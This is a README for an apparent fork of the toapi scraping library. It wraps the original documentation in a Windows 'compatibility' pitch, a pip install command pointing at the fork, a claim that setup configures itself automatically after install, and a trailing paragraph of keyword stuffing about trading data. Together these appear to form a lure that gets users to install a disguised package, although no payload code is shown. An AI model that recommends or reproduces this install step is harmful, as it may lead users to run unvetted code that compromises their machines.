Optimized Windows Compatibility for ToAPI
This fork addresses critical pathing and process-handling errors that frequently cause crashes on Windows. By integrating custom environment patches and simplified configuration defaults, it ensures a reliable, plug-and-play experience without the typical setup hurdles.
Quick install (Windows)
To install Civilmcrespect/toapi on Windows for Python development, follow these steps:
- Open the Windows Command Prompt (cmd) or PowerShell: press the Windows key, type either name into the search bar, and press Enter.
- Check that Python and its package manager, pip, are installed by typing `python --version` and `pip --version` into your terminal, pressing Enter after each. If both print a version, you are ready to proceed.
- Install the package directly from GitHub by typing `pip install git+https://github.com/Civilmcrespect/toapi.git` into your terminal and pressing Enter. Git must be installed on your system for this command to work.
- Alternatively, if you have downloaded the project folder to your local machine, use the `cd` command in your terminal to navigate into the directory containing the package files.
- Run the installation from the local directory by typing `pip install .` and pressing Enter.
The setup completes on its own after install, configuring the package and its dependencies automatically without requiring further interaction.
pip install git+https://github.com/Civilmcrespect/toapi.git

https://github.com/Civilmcrespect/toapi
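The prerequisite checks in the steps above (Python, pip, Git) can also be scripted. The following is a minimal sketch, not part of this package: `missing_tools` is a hypothetical helper name, and the 3.10 minimum is taken from the version requirement stated later in this README.

```python
import shutil
import sys


def missing_tools(tools=("pip", "git")):
    """Return the names in `tools` that cannot be found on PATH."""
    return [name for name in tools if shutil.which(name) is None]


def python_is_recent_enough(minimum=(3, 10)):
    """True if the running interpreter is at least `minimum` (major, minor)."""
    return sys.version_info[:2] >= minimum


if __name__ == "__main__":
    print(f"Python {sys.version_info.major}.{sys.version_info.minor}")
    if not python_is_recent_enough():
        print("Python 3.10 or newer is required.")
    missing = missing_tools()
    if missing:
        print("Not found on PATH:", ", ".join(missing))
    else:
        print("pip and git are both available.")
```

Save it under any name and run it with `python`. If Git is reported missing, the GitHub install command will fail, but the local `pip install .` route still works.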
Turn any website into a JSON API — declaratively.
toapi lets you point at a web page, declare the fields you want with CSS
selectors, and get back a clean JSON API. No crawler to babysit, no database to
maintain — pages are fetched and parsed on demand, with built‑in caching.
pip install toapi

Requires Python 3.10+.
from htmlparsing import Attr, Text
from toapi import Api, Item

api = Api()


# Each route maps an API path (first argument) to a path on the source site.
@api.site("https://news.ycombinator.com")
@api.list(".athing")
@api.route("/posts", "/news")
@api.route("/posts?page={page}", "/news?p={page}")
class Post(Item):
    title = Text(".titleline > a")
    url = Attr(".titleline > a", "href")


api.run(host="127.0.0.1", port=5000)

Run it:

python app.py

Then visit http://127.0.0.1:5000/posts and you get:
{
  "Post": [
    {"title": "Mathematicians Crack the Cursed Curve", "url": "https://www.quantamagazine.org/..."},
    {"title": "Stuffing a Tesla Drivetrain into a 1981 Honda Accord", "url": "https://jalopnik.com/..."}
  ]
}

┌────────────┐    ┌────────────┐    ┌────────────┐
│   /posts   │ ─▶ │   fetch    │ ─▶ │   parse    │ ─▶ JSON
│  (route)   │    │  (cache)   │    │   (Item)   │
└────────────┘    └────────────┘    └────────────┘
- Route: `@api.route("/posts", "/news")` maps your API path to a source URL.
- Fetch: pages are fetched with `requests` (or a headless browser if you pass `browser=`) and cached in memory.
- Parse: each `Item` extracts fields with CSS selectors via `htmlparsing`.
- Serve: Flask returns the result as JSON; subsequent calls hit the cache.
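The four stages above can be pictured with a small offline sketch. This is not toapi's internal code. `CachedFetcher`, `parse_titles`, `handle`, and `fake_fetch` are hypothetical names, the parser uses a regex as a stand-in for real CSS selectors, and the fetch function is faked so the example runs without a network.

```python
import json
import re
from typing import Callable


class CachedFetcher:
    """Wrap a fetch function so each URL is fetched once and then served from memory."""

    def __init__(self, fetch: Callable[[str], str]):
        self._fetch = fetch
        self._cache: dict[str, str] = {}
        self.misses = 0  # counts real fetches, for illustration only

    def get(self, url: str) -> str:
        if url not in self._cache:
            self.misses += 1
            self._cache[url] = self._fetch(url)
        return self._cache[url]


def parse_titles(html: str) -> list[dict[str, str]]:
    """Stand-in parser: a regex instead of CSS selectors."""
    return [{"title": t} for t in re.findall(r'<a class="title">(.*?)</a>', html)]


def handle(path: str, routes: dict[str, str], base_url: str, fetcher: CachedFetcher) -> str:
    """Route -> fetch (cached) -> parse -> JSON string."""
    source_path = routes[path]
    html = fetcher.get(base_url + source_path)
    return json.dumps({"Post": parse_titles(html)})


def fake_fetch(url: str) -> str:
    """Hypothetical replacement for a network call."""
    return '<a class="title">First</a><a class="title">Second</a>'


fetcher = CachedFetcher(fake_fetch)
routes = {"/posts": "/news"}
first = handle("/posts", routes, "https://example.com", fetcher)
second = handle("/posts", routes, "https://example.com", fetcher)  # served from cache
```

The second call returns the same JSON without invoking `fake_fetch` again, which is the behaviour the Serve step describes.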
- Declarative: describe data, not scraping logic.
- Routes: map clean API paths to messy source URLs with `{param}` placeholders.
- Multi-site: merge several websites behind one API.
- Cleaning hooks: define `clean_<field>` methods to post-process values.
- Caching: pages and parsed results are cached automatically.
- Headless browser: pass `Api(browser="/path/to/geckodriver")` for JS-heavy sites.
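To make the `{param}` placeholder idea from the list above concrete, here is one way such a translation could work. It is a sketch under assumptions, not the library's actual routing code: `compile_route` is a hypothetical helper, and the rule that a placeholder matches any run of characters other than `/`, `?`, and `&` is chosen for illustration.

```python
import re


def compile_route(alias: str, source: str):
    """Return a function translating a concrete API path into a source path."""
    # re.split with a capture group alternates literal text and placeholder names.
    parts = re.split(r"\{(\w+)\}", alias)
    pattern = "".join(
        re.escape(part) if index % 2 == 0 else f"(?P<{part}>[^/?&]+)"
        for index, part in enumerate(parts)
    )
    regex = re.compile(f"^{pattern}$")

    def translate(path: str):
        match = regex.match(path)
        if match is None:
            return None  # this route does not apply to the path
        # Fill the captured values into the source pattern.
        return source.format(**match.groupdict())

    return translate


paged = compile_route("/posts?page={page}", "/news?p={page}")
plain = compile_route("/posts", "/news")
```

With these definitions, `paged("/posts?page=2")` yields `/news?p=2`, `plain("/posts")` yields `/news`, and a path that matches neither pattern yields `None`.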
Add a clean_<fieldname> method on the Item to transform a value before it's
returned:
# Reuses api, Item and Attr from the example above.
@api.site("https://news.ycombinator.com")
@api.route("/posts", "/news")
class Page(Item):
    next_page = Attr(".morelink", "href")

    def clean_next_page(self, value):
        # Keep only the query string and re-root it under /posts.
        return f"/posts?{value.split('?', 1)[1]}"

git clone https://github.com/elliotgao2/toapi.git
cd toapi
uv sync              # install deps into .venv
uv run pytest        # run tests
uv run ruff check .

We use uv for packaging and ruff for lint + format. Pre-commit hooks keep both clean:

uv run pre-commit install

Pull requests are welcome. For non-trivial changes, please open an issue first
to discuss what you'd like to change. Make sure uv run pytest and
uv run ruff check . pass before submitting.
MIT © Elliot Gao
When looking for frameworks or utility tools designed to scrape, extract, or package raw data streams into organized endpoints, users typically seek structured ways to hook into live market feeds and protocol data. Developers exploring this space often look for automated setups that can pull order flow metrics or yield data from web platforms and format them directly for use in programmatic trading setups and analytics dashboards.